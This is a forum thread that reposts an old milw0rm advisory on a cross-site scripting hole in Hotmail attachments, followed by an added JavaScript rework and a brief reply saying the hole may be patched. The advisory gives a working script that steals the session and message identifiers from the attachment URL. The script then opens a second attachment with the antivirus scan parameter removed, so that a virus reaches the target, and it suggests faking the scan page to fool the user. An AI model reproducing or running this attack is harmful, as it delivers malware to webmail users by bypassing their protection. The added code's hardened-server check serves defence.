Guest Nemessis

- HOTMAIL XSS and AV bypass exploit - presented by Tontonq


- HOTMAIL XSS and AV bypass exploit -

To show a practical exploit of the XSS on the Hotmail webmail server, let's do something dirty... let's force the target user to do something that he would never have allowed: downloading a virus (from Hotmail, of course) :)

I was thinking of some kind of mailbox access, but I needed ActiveX help, and some people could think: "I do not allow ActiveX on my browser..." or "I run Mozilla...", etc. So the challenge has been to show how, only with JavaScript, an XSS that is theoretically non-exploitable (no access to cookies), plus some misconfiguration on the Hotmail webmail server, can result in a serious security problem.

1) I know XSS is present (on file attachments) (good)

2) No access to cookies from the injected code (bad)

3) It is not a flaw in input filtering; any script code is allowed (good)

4) I don't know if there is any kind of IP-based session tracking method (bad)

5) Redirecting the output of forced client requests from the XSS code is possible (good)

6) The code to successfully exploit redirection (ActiveX, extended XML, ...) is browser dependent (bad)

So at least the only room I have to play in is JavaScript (exploiting the XSS only with HTML injection doesn't seem to be effective in this case...).

If we take a look at the URL from where attachments are opened, we can see the session identifier and the message identifier. With this info we can build a request to... the same message we have sent?

Yes, yes, yes. The same message (same identifier) can have many attachments... We can make a request to the same message but a different attachment...

Why this??? Imagine that we could bypass the antivirus software with only a little modification of the HTTP request... We could not do this in the same attachment in which we send our XSS code, because that one is directly opened by the target's browser, but we could still force a crafted request from our XSS code to open a different attachment (in the same message) without calling the AV software. :)

How to bypass the AV software...

This is a sample URL to get an attachment from Hotmail:

http://by7fd.bay7.hotmail.msn.com/cg...ox=F000000001&a=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX&msg=MSGXXXXXXXXXX.XX&start=XXXXXXX&len=XXXX&mimepart=3&vscan=scan

"vscan=scan" ... ummm... Remove this, and the antivirus will not be called! Scared? Wait... :)

Now let's send the target user a mail with two attachments. The first one with this code:

---------------------------------------------------------------------------------------------

<html>
<script>
// The first attachment is opened "online" by Hotmail, so this script runs
// inside the target's Hotmail session and can read the attachment URL.
str1=document.URL
// Cut out the part of the query string that carries the "a=" (session)
// and "msg=" (message) parameters. The offsets depend on the exact layout
// of the URL; see the note below.
str2=str1.slice(55,110)
splitString = str2.split("&")
str3=splitString[0]+"&"+splitString[1]
// Request the second attachment (mimepart=4) of the same message, without
// the vscan=scan parameter, so it is served without calling the AV software.
window.open('http://by7fd.bay7.hotmail.msn.com/cgi-bin/getmsg?curmbox=F000000001&a='+str3+'&mimepart=4')
</script>
</html>

----------------------------------------------------------------------------------------------

Notice that to make this code work in any environment, you will have to use "splits" and not "slices". This is a proof-of-concept exploit. The only important thing is to extract the user and message identifiers, no matter how you achieve this. If this code doesn't work for you, try to change slice(X,Y).

The second attachment will be a virus testing file (for example EICAR).

Once the target opens the first attachment, the AV software will tell him that all is OK, but when he tries to download the file, it will be opened "online", the XSS code will be executed and:

- the session ID and message ID will be retrieved

- a new window will be opened pointing to the second attachment, but without calling the AV software

What does the user see?

He will see that he can download the file without any AV warning, and he will see that he is downloading from Hotmail.

An experienced user may notice that something strange is happening... but it is still possible to trick him by opening a page similar to the one shown when the AV software is called... As always, now the only limit is the imagination of the attacker.

Conclusions:

-XSS is present on Hotmail

-Hotmail Antivirus software can easily be bypassed exploiting this XSS

-Users of Hotmail are at high risk

XSS Screenshots:

http://www.infohacking.com/INFOHACKI...otmail_XSS.png

http://www.infohacking.com/INFOHACKI...otmail_XSS.png

http://www.infohacking.com/INFOHACKI...otmail_XSS.png

http://www.infohacking.com/INFOHACKI...otmail_XSS.png

http://www.infohacking.com/INFOHACKI...otmail_XSS.png

// Stay well..

Credit - presented by Tontonq on milw0rm.com

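The posted exploit depends on document.URL.slice(55,110) landing exactly on the "a=" and "msg=" parameters, which the advisory itself notes is environment dependent. The block below is an added example, not code from the advisory, from Tontonq, or from this thread: it reworks the extraction by parameter name with the URL parser (the "splits, not slices" variant the post recommends), builds the same unscanned-attachment request, and models the server-side scan decision the post infers from the vscan=scan parameter. The sample URLs are constructed to match the shape quoted in the post with placeholder identifiers, the second host name is hypothetical, and the two "server" functions are a hypothetical model of the described behaviour, not Hotmail's actual code. It runs under Node; in a browser you would pass document.URL (or location.href) instead of the sample string.

```javascript
// Added example (not code from the original advisory or this thread).
// Constructed sample of the attachment URL shape quoted in the post;
// the a= and msg= values are placeholders, not real identifiers.
const SAMPLE_DOC_URL =
  "http://by7fd.bay7.hotmail.msn.com/cgi-bin/getmsg?curmbox=F000000001" +
  "&a=0123456789abcdef0123456789abcdef&msg=MSG1234567890.12" +
  "&start=1234567&len=4321&mimepart=3&vscan=scan";

// The same request served from a host with a longer (hypothetical) name,
// so every query parameter starts three characters later in the string.
const SAMPLE_DOC_URL_OTHER_HOST = SAMPLE_DOC_URL.replace(
  "by7fd.bay7.hotmail.msn.com",
  "law9-f12.law9.hotmail.msn.com"
);

// What the posted exploit does: cut a fixed character range out of the URL,
// split it on "&" and keep the first two pieces (expected to be "a=..." and
// "msg=..."). Correct only when the offsets match this exact URL layout.
function extractIdsByOffset(docUrl, start, end) {
  const pieces = docUrl.slice(start, end).split("&");
  return pieces[0] + "&" + pieces[1];
}

// The "split, not slice" variant: look the parameters up by name with the
// URL parser, so host name and identifier lengths no longer matter.
function extractIds(docUrl) {
  const params = new URL(docUrl).searchParams;
  const a = params.get("a");
  const msg = params.get("msg");
  if (a === null || msg === null) {
    throw new Error("URL does not carry the a= and msg= identifiers");
  }
  return { a, msg };
}

// Build the request the exploit opens in a new window: same mailbox, same
// session (a) and message (msg) identifiers, a different MIME part, and no
// vscan parameter at all.
function buildUnscannedAttachmentUrl(docUrl, mimepart) {
  const u = new URL(docUrl);
  const { a, msg } = extractIds(docUrl);
  const q = new URLSearchParams({
    curmbox: u.searchParams.get("curmbox") || "F000000001",
    a,
    msg,
    mimepart: String(mimepart),
  });
  return u.origin + u.pathname + "?" + q.toString();
}

// Hypothetical model of the server-side decision the post describes:
// the attachment is scanned only when the client sends vscan=scan.
function vulnerableServerScans(requestUrl) {
  return new URL(requestUrl).searchParams.get("vscan") === "scan";
}

// Hardened model: whether an attachment is scanned before delivery is a
// server policy and is never taken from a client-supplied query parameter.
function hardenedServerScans(requestUrl) {
  void requestUrl; // parsed for everything else, never for this decision
  return true;
}

// Stand-alone demonstration.
console.log("by offset :", extractIdsByOffset(SAMPLE_DOC_URL, 68, 123));
console.log("other host:", extractIdsByOffset(SAMPLE_DOC_URL_OTHER_HOST, 68, 123));
console.log("by name   :", extractIds(SAMPLE_DOC_URL_OTHER_HOST));
const crafted = buildUnscannedAttachmentUrl(SAMPLE_DOC_URL, 4);
console.log("crafted   :", crafted);
console.log("vulnerable server scans crafted request:", vulnerableServerScans(crafted));
console.log("hardened server scans crafted request  :", hardenedServerScans(crafted));
```

The offsets 68 and 123 are the right ones for the constructed sample; on the second host the same slice starts inside the curmbox value and the first "&"-separated piece is no longer the a= parameter, which is exactly the failure the advisory warns about. The hardened model is the check a server needs regardless of how the client builds its URL: a scan that a client can switch off by dropping a query parameter is not a scan.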

Nemessis wrote: It is a new post on milw0rm, Th0R. I don't know exactly how old it is.

Hmm ..

I found that website of: http://www.infohacking.com/INFOHACKING_RESEARCH/Our_Advisories/Hotmail/index.htm

Like 9 months / 1 year ago ..

It's pretty old though ..

As far as I can remember this thing is not working anymore ..

But I will try it again ..

Anyway thanks for reporting it Nemessis xD~~

I don't know if it is new on milw0rm xD~~

Thanks.

Th0R
